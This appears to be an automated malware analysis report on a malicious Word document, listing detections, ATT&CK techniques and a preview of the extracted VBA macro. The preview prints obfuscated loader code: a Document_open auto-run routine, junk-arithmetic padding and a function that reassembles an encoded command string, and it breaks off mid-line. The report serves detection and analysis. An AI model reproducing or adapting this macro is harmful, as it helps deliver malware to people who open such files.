Verdict: MALICIOUS
Risk Score: 182
Malware Insights
MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a Microsoft Office document containing VBA macros. The critical heuristic 'OLE_VBA_SHELL' indicates a Shell() call within the VBA code, and the 'Document_Open' macro suggests automatic execution upon opening. This points to the document's primary function being to execute arbitrary commands, likely to download and run a secondary payload. The ClamAV detection further confirms its malicious nature.
Heuristics (5)
- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 45308 bytes |

SHA-256 of macros.bas: ec89f46b0208eaa655fbff2bccc4893a496dd698b6e0df60d1f04b386878e1c3
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "WiaiLmFKj"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub mdjsI(tToDl)
qzQYYW = 17942 - CDbl(12207 / Int(81949) - 16820 / Round(86044 / CSng(1615 - CByte(77590)))) * XuVXC * Fix(6817) - 11712 / CByte(kFupD) / MrvTVa - CBool(61509) / iHqGY / Atn(84156)
End Sub
Sub dkfEz(zzQAhm)
NKijTY = 88569 - CDbl(99073 / Int(25388) - 49080 / Round(60446 / CSng(27373 - CByte(59805)))) * LOhwi * Fix(27555) - 7336 / CByte(UOkGG) / tfSnn - CBool(8862) / YcGmAz / Atn(22021)
KzqSI = 77418 - CDbl(67228 / Int(67514) - 6959 / Round(6101 / CSng(46109 - CByte(45323)))) * pQwNR * Fix(63699) - 11616 / CByte(Graahm) / aJiQsp - CBool(19535) / unwYK / Atn(92232)
kPhji = 23958 - CDbl(15432 / Int(49643) - 66808 / Round(31894 / CSng(10412 - CByte(66206)))) * IPrbB * Fix(93995) - 16292 / CByte(YHfRfB) / ZTIvm - CBool(83011) / KtAEZ / Atn(35804)
End Sub
Sub vAmHFG(wXXNnV)
IBPCK = 7253 - CDbl(1228 / Int(29900) - 15654 / Round(19039 / CSng(92798 - CByte(25261)))) * FwawX * Fix(80487) - 19404 / CByte(HsKZvZ) / vlhwVv - CBool(4036) / lBOOjf / Atn(84427)
LsFZzw = 50595 - CDbl(81527 / Int(95459) - 21806 / Round(65548 / CSng(2257 - CByte(18437)))) * dPiXT * Fix(44218) - 53907 / CByte(rEDGpv) / bazPP - CBool(98646) / pAizKr / Atn(2009)
End Sub
Private Sub Document_open()
On Error Resume Next
NAijY = 97475 - CDbl(70608 / Int(22168) - 23765 / Round(40216 / CSng(1976 - CByte(25987)))) * AWrGi * Fix(64994) - 43528 / CByte(kluFwa) / sUMkwj - CBool(82812) / YJXJq / Atn(29505)
Application.Run uOlfoi + "CqRtfVF" + sjJiZd, nbcXG + LQJcjCruJYrCJ + sIQQU
TSzHX = 62199 - CDbl(40640 / Int(99058) - 83184 / Round(61955 / CSng(37824 - CByte(31869)))) * zFbjaS * Fix(13569) - 26692 / CByte(kivljw) / lzULiK - CBool(40239) / YlwEdX / Atn(14294)
End Sub
Sub LlHNR(pwNvjh)
MlwYG = 10602 - CDbl(66369 / Int(97803) - 10117 / Round(14799 / CSng(80030 - CByte(69574)))) * HpUCkP * Fix(56807) - 51569 / CByte(AcibJI) / widnf - CBool(23785) / BjWSYI / Atn(11908)
RdlVAi = 21237 - CDbl(22549 / Int(34074) - 8093 / Round(78054 / CSng(54592 - CByte(72581)))) * piwac * Fix(13923) - 48115 / CByte(wAvpS) / NwESd - CBool(42733) / FqnHr / Atn(74963)
LirjO = 62602 - CDbl(81739 / Int(84617) - 42259 / Round(97159 / CSng(60752 - CByte(97985)))) * FjkaL * Fix(22854) - 78871 / CByte(UzWwPJ) / oISlUC - CBool(1541) / ILbmf / Atn(40841)
End Sub
Sub GmiRFY(NwfzY)
jUlwWG = 7132 - CDbl(25908 / Int(61032) - 88183 / Round(59032 / CSng(5619 - CByte(8360)))) * cOkZJ * Fix(56255) - 88796 / CByte(jUwELi) / WGWdKi - CBool(76750) / cPZRN / Atn(50696)
End Sub
Sub zOBGdz(Fovwp)
RASuVS = 17909 - CDbl(75778 / Int(16171) - 48689 / Round(88728 / CSng(76632 - CByte(77124)))) * HJkLjT * Fix(82022) - 38612 / CByte(CFEvKA) / iNoCIc - CBool(93988) / wuRFro / Atn(13858)
pKEvE = 68256 - CDbl(29929 / Int(43787) - 90018 / Round(94400 / CSng(31358 - CByte(30699)))) * QXzmaq * Fix(62217) - 98280 / CByte(jfNFPm) / lcuvm - CBool(29145) / FEdwwR / Atn(14697)
End Sub
Attribute VB_Name = "MjpfXRSQ"
Sub aTDiZi(UdUJUV)
CBmth = 94555 - CDbl(84675 / Int(65627) - 63717 / Round(57724 / CSng(39310 - CByte(36764)))) * PjPkSL * Fix(94045) - 39783 / CByte(LHfWi) / VzwrqM - CBool(74250) / kYkTGs / Atn(73589)
End Sub
Function LQJcjCruJYrCJ()
On Error Resume Next
JZdsc = 22539 - CDbl(37863 / Int(27772) - 37389 / Round(58166 / CSng(64514 - CByte(54346)))) * PiMJFM * Fix(68126) - 59475 / CByte(HqIcU) / hMRUA - CBool(71228) / MWcFU / Atn(32437)
vqAtmKBHuf = MAioa("Pc1.classeoN.Spli'+'t(eNk9+Nk9oN@eNk9+Nk9oNk9+N'+'k9N);Nk9+Nk9vh'+'tSDCNk9+Nk9 = vhNk9+Nk9teNk9+Nk9nNk'+'9+O8R0d1", ZUwmj - ZUwmj + 4 + ZUwmj - ZUwmj, ZUwmj - ZUwmj + 104 + ZUwmj - ZUwmj)
ckHjHi = 44481 - CDbl(55576 / Int(96505) - 94964 / Round(38870 / CSng(81664 - CByte(83876)))) * Smjzr * Fix(27924) - 64137 / CByte(NNbww) / pjArS - CBool(7431) / WicVpi / Atn(8066)
SwOiSt = 7651 - CDbl(23025 / Int(90276) - 43316 / Round(82698 / CSng(58448
... (truncated)